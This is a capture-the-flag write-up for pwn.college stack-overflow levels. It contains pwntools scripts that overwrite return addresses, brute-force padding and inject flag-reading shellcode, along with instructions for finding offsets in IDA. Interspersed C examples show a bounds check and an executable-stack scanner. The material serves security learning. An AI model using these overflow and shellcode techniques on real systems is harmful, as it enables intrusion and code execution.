Binary Exploitation Write Up PT 2
Level 2.1 (babymem)
import pwn

input_buffer_size = 40      # from IDA, see note (mine was 28h = 40)
injection = 0x21B14E3B      # from IDA, see note (mine)

with pwn.process("/challenge/babymem_level2.1") as process:
    # fill the input buffer, then the 4-byte value the cmp in the note checks
    payload = b'a' * input_buffer_size + injection.to_bytes(4, 'little')
    process.sendline(str(len(payload)).encode())   # the program asks for the input size first
    process.send(payload)
    print(process.recvall().decode())
Note: use IDA to find both values. For inputBufferSize, open the challenge function and look under the second lea, where the add is; it should be a number with an h after it. Convert it to decimal and that is your input size (mine was 28h = 40). For the injection, stay in the challenge function and scroll all the way down until you see short loc_1CD5; double-click it and look at the cmp. That hex number is your injection. So mine looked like this: payload = b'a'*40 + 0x21B14E3B.to_bytes(4, 'little')
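The babymem levels above all have the same shape: the program asks for an input size, believes it, and copies that many bytes into a buffer whose size IDA shows as a constant (28h = 40 for level 2.1), so a 44-byte payload runs past the buffer into the saved registers and return address. The following is an added illustration written for this write-up, not the challenge's own source: it re-implements the "size line, then payload" request format in C with the size actually checked against the buffer, and shows the 44-byte level 2.1 payload being rejected while an in-bounds one is stored. The function names, the request builder and the 40-byte buffer constant are this example's own choices.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Buffer size the write-up recovered from IDA for level 2.1 (28h = 40). */
#define INPUT_BUF_SIZE 40

/*
 * Request format the scripts above speak: a decimal size line, then that
 * many payload bytes.  Returns 0 and fills size/payload on success, -1 on a
 * malformed request (no size line, non-digits, numeric overflow, or fewer
 * payload bytes than claimed).  Constructed for this example.
 */
static int parse_request(const unsigned char *wire, size_t wire_len,
                         size_t *size_out, const unsigned char **payload_out)
{
    const unsigned char *nl = memchr(wire, '\n', wire_len);
    if (nl == NULL || nl == wire)
        return -1;
    size_t line_len = (size_t)(nl - wire);
    size_t size = 0;
    for (size_t i = 0; i < line_len; i++) {
        if (wire[i] < '0' || wire[i] > '9')
            return -1;
        if (size > (SIZE_MAX - 9) / 10)
            return -1;                    /* size would wrap around */
        size = size * 10 + (size_t)(wire[i] - '0');
    }
    if (size > wire_len - line_len - 1)
        return -1;                        /* claims more bytes than were sent */
    *size_out = size;
    *payload_out = nl + 1;
    return 0;
}

/*
 * The bug the write-up exploits is a copy of `size` bytes with no comparison
 * against the destination: 40 bytes of 'a' plus a 4-byte value overrun a
 * 40-byte buffer.  This version rejects anything that does not fit together
 * with its terminator instead of copying it.
 */
static long store_input_checked(char *buf, size_t buf_size,
                                const unsigned char *payload, size_t size)
{
    if (buf_size == 0 || size >= buf_size)
        return -1;
    memcpy(buf, payload, size);
    buf[size] = '\0';
    return (long)size;
}

/* Parses one request and stores it in a 40-byte buffer; returns bytes stored, or -1 if rejected. */
long handle_request(const unsigned char *wire, size_t wire_len)
{
    char buf[INPUT_BUF_SIZE];
    size_t size;
    const unsigned char *payload;
    if (parse_request(wire, wire_len, &size, &payload) != 0)
        return -1;
    return store_input_checked(buf, sizeof buf, payload, size);
}

/* Builds "<len>\n" followed by len bytes of `fill`, the shape the scripts send; returns 0 if it does not fit. */
size_t build_request(unsigned char *out, size_t out_cap, size_t payload_len, unsigned char fill)
{
    int n = snprintf((char *)out, out_cap, "%zu\n", payload_len);
    if (n < 0 || (size_t)n >= out_cap || payload_len > out_cap - (size_t)n)
        return 0;
    memset(out + n, fill, payload_len);
    return (size_t)n + payload_len;
}

/* Builds and handles one request of the given payload length; -2 means it did not fit the wire buffer. */
long run_request(size_t payload_len, unsigned char fill)
{
    unsigned char wire[256];
    size_t len = build_request(wire, sizeof wire, payload_len, fill);
    if (len == 0)
        return -2;
    return handle_request(wire, len);
}

int main(void)
{
    printf("10 bytes -> %ld\n", run_request(10, 'a'));   /* stored: 10 */
    printf("44 bytes -> %ld\n", run_request(44, 'a'));   /* level 2.1 payload length: rejected, -1 */
    return 0;
}
```

The check that matters is the single comparison in store_input_checked: the claimed size is compared with the real buffer size before anything is copied, which is exactly what the challenge binary omits.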
Level 3.1 (babymem)
from pwn import *
import pwn

pwn.context.update(arch="amd64")
pwn.context.log_level = "error"

hexvalue = 0x401F57     # address from the win function in IDA; see note (mine)

# brute force the padding length: one fresh process per candidate offset
for i in range(1, 200):
    print("hello")
    with pwn.process("/challenge/babymem_level3.0") as p:
        p.clean()
        p.sendline(b'10000')        # claimed input size, larger than the real buffer
        p.clean()
        print(i)
        payload = b'A' * i
        payload += p32(hexvalue)    # see note
        p.send(payload)
        out = p.clean().decode()
        if "pwn" in out:
            print(out)
            break
Note: to find the hex value, open IDA, go to the win function and decompile it, then click on the puts that prints “You win! Here is your flag”; the number at the bottom of your screen is your hex value. Mine was 401F57, but I put 0x401F57 in the actual code.
Level 6.1 (babymem)
from pwn import *
import pwn
import sys

pwn.context.update(arch="amd64")
pwn.context.log_level = "error"

first_val = int(sys.argv[1], 0)          # 1st val from IDA (decimal or 0x-prefixed hex); see the steps below
second_val = bytes.fromhex(sys.argv[2])  # 2nd val from IDA, given as hex bytes

for i in range(0, 200):
    print(i)
    for s in range(40):                  # retry the same payload several times per round
        with pwn.process("/challenge/babymem_level6.1") as p:
            p.clean()
            p.sendline(b'10000')
            p.clean()
            print(i)
            payload = b'\x00' * first_val + second_val   # both found in IDA
            p.send(payload)
            out = p.recvall().decode()
            if "pwn" in out:
                print(out)
                sys.exit(0)              # stop both loops once the flag is printed
To find the 1st val:
1. Go to IDA
2. Navigate to the challenge function on the left
3. Find the first "add rsp, 0xFFFFFFFFFFFFFFFFFFF??h" line
4. The ?? is your hex value. Convert it to decimal, add 8 to it, and then convert that back to hex (important)
5. If you don't have the above line and it is sub instead, follow the steps to find the 1st value in levels 7.0/7.1
6. This is your 1st val
Level 8.0/8.1 (babymem)
from pwn import *
import pwn
import sys

pwn.context.update(arch="amd64")
pwn.context.log_level = "error"

first_val = int(sys.argv[1], 0)          # 1st val from IDA, found like level 7 (decimal or 0x-prefixed hex)
second_val = bytes.fromhex(sys.argv[2])  # 2nd val from IDA, given as hex bytes

for i in range(0, 200):                  # outer retry loop as in level 6.1 (the line was missing from the original listing)
    print(i)
    for s in range(40):
        with pwn.process("/challenge/babymem_level8.0") as p:
            p.clean()
            p.sendline(b'10000')
            p.clean()
            print(i)
            payload = b'\x00' * first_val + second_val   # find both in IDA like level 7
            p.send(payload)
            out = p.recvall().decode()
            if "pwn" in out:
                print(out)
                sys.exit(0)              # stop both loops once the flag is printed
Level 1.0 (toddlerone)
1. Run the challenge.
2. Find where it says “input buffer begins at…” and count how many lines there are from that line to the 2nd-to-last line, then multiply that number by 8; mine is 13*8 = 104.
3. It should say “shellcode at xxxxx!” in the help text; paste that address (xxxxx) into the template.
from pwn import *
import sys

context.arch = "amd64"
shellcode_addr = int(sys.argv[1], 0)    # the "shellcode at ..." address from step 3 (or from IDA)

sc = asm(f"""
{shellcraft.cat2('/flag')}
""")

while True:
    for x in range(30):                 # brute force the padding: x * 8 bytes per try
        p = process("/challenge/toddlerone_level1.0")
        p.send(sc)
        size = x * 8
        payload = b'a' * size + p64(shellcode_addr)
        p.sendline(str(len(payload)).encode())
        p.send(payload)
        print(p.recvall().decode())
        p.close()
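The toddlerone levels write the shellcode into the stack-resident input buffer and then return into it, which only works if the memory holding it is executable; for a stack buffer, that is declared by the binary's PT_GNU_STACK program header, and it is the first property a reviewer checks on such a binary. Below is an added example, not part of this write-up or of the pwn.college challenge code: a small ELF64 scanner that reports whether PT_GNU_STACK marks the stack executable, exercised on a constructed minimal in-memory image (a header plus one program header) so it runs offline. gnu_stack_executable, make_test_elf and check_constructed are this example's own names.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define PT_GNU_STACK 0x6474e551u   /* program header type carrying the stack permissions */
#define PF_X 0x1u
#define PF_W 0x2u
#define PF_R 0x4u

/* Little-endian field readers; callers bounds-check before calling. */
static uint16_t rd16(const unsigned char *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const unsigned char *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static uint64_t rd64(const unsigned char *p) { return (uint64_t)rd32(p) | ((uint64_t)rd32(p + 4) << 32); }

/*
 * Scans an ELF64 little-endian image for PT_GNU_STACK.
 *   1 : stack marked executable (PF_X set); code written into a stack buffer can run
 *   0 : stack non-executable; the same bytes fault instead of running
 *  -1 : not an ELF64 LE image, or the program header table runs past the image
 *  -2 : no PT_GNU_STACK header; the loader applies a platform default, so review it
 */
int gnu_stack_executable(const unsigned char *elf, size_t len)
{
    if (len < 64 || memcmp(elf, "\x7f" "ELF", 4) != 0)
        return -1;
    if (elf[4] != 2 || elf[5] != 1)          /* EI_CLASS ELFCLASS64, EI_DATA ELFDATA2LSB */
        return -1;
    uint64_t phoff = rd64(elf + 32);         /* e_phoff */
    uint16_t phentsize = rd16(elf + 54);     /* e_phentsize */
    uint16_t phnum = rd16(elf + 56);         /* e_phnum */
    if (phentsize < 56 || phoff > len)
        return -1;
    for (uint16_t i = 0; i < phnum; i++) {
        uint64_t off = phoff + (uint64_t)i * phentsize;
        if (off > len || len - off < 56)
            return -1;
        const unsigned char *ph = elf + off;
        if (rd32(ph) == PT_GNU_STACK)        /* p_type, followed by p_flags */
            return (rd32(ph + 4) & PF_X) ? 1 : 0;
    }
    return -2;
}

/*
 * Constructed minimal image for offline testing: a 64-byte ELF header whose
 * program header table (one PT_GNU_STACK entry) starts at offset 64.  It is
 * not a loadable binary; only the fields the scanner reads are filled in.
 */
size_t make_test_elf(unsigned char *out, size_t cap, uint32_t stack_flags)
{
    if (cap < 64 + 56)
        return 0;
    memset(out, 0, 64 + 56);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = 2;            /* ELFCLASS64 */
    out[5] = 1;            /* ELFDATA2LSB */
    out[32] = 64;          /* e_phoff = 64 */
    out[54] = 56;          /* e_phentsize = sizeof(Elf64_Phdr) */
    out[56] = 1;           /* e_phnum = 1 */
    for (int i = 0; i < 4; i++) {
        out[64 + i] = (unsigned char)(PT_GNU_STACK >> (8 * i));   /* p_type */
        out[68 + i] = (unsigned char)(stack_flags >> (8 * i));    /* p_flags */
    }
    return 64 + 56;
}

/* Builds a test image with the given stack flags and scans it. */
int check_constructed(uint32_t stack_flags)
{
    unsigned char img[64 + 56];
    size_t n = make_test_elf(img, sizeof img, stack_flags);
    return gnu_stack_executable(img, n);
}

int main(void)
{
    printf("RWX stack -> %d\n", check_constructed(PF_R | PF_W | PF_X));   /* 1 */
    printf("RW  stack -> %d\n", check_constructed(PF_R | PF_W));          /* 0 */
    return 0;
}
```

To run the same check on a real file, read it into memory and pass the bytes to gnu_stack_executable; a result of 1 is the condition these levels depend on, and the linker flag that removes it (a non-executable PT_GNU_STACK) is what takes this whole class of payload off the table.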
Level 2.0 (toddlerone)
1. Run the challenge.
2. Repeat step 2 from above and write the result into the template below (yes, the code is different).
from pwn import *
import sys

context.arch = "amd64"
size = int(sys.argv[1])                 # line count * 8 from step 2
shellcode_addr = int(sys.argv[2], 0)    # help-text address + 0x18 from step 3

sc = asm(f"""
{shellcraft.cat2('/flag')}
""")

# The original template does not spell out how `payload` is built from `sc`,
# `size` and the step-3 address; fill that in before running.
payload = b''

p = process("/challenge/toddlerone_level2.0")
print(p.recvuntil(b'size: '))
p.sendline(str(size).encode())
print(p.recvuntil(b'bytes)!'))
p.send(payload)
p.interactive()
3. Grab the address in the last line of the help text and add 0x18 to it; this is the shellcode address to put in the code template (use an online hex calculator).
   * for example, mine is 0x7f…fd2a8 + 0x18 = 0x7f…fd2c0
4. Enter the values into the code template above (the full address in my case was 0x00007fffffffd2c0).
Level 2.1 (toddlerone)
This is going to be another brute force method.
1. First, try running your code from 2.0.
2. If that works, good for you.
3. If not, pick a random line count between 1 and 30.
4. Repeat until you get the flag.
Results may vary.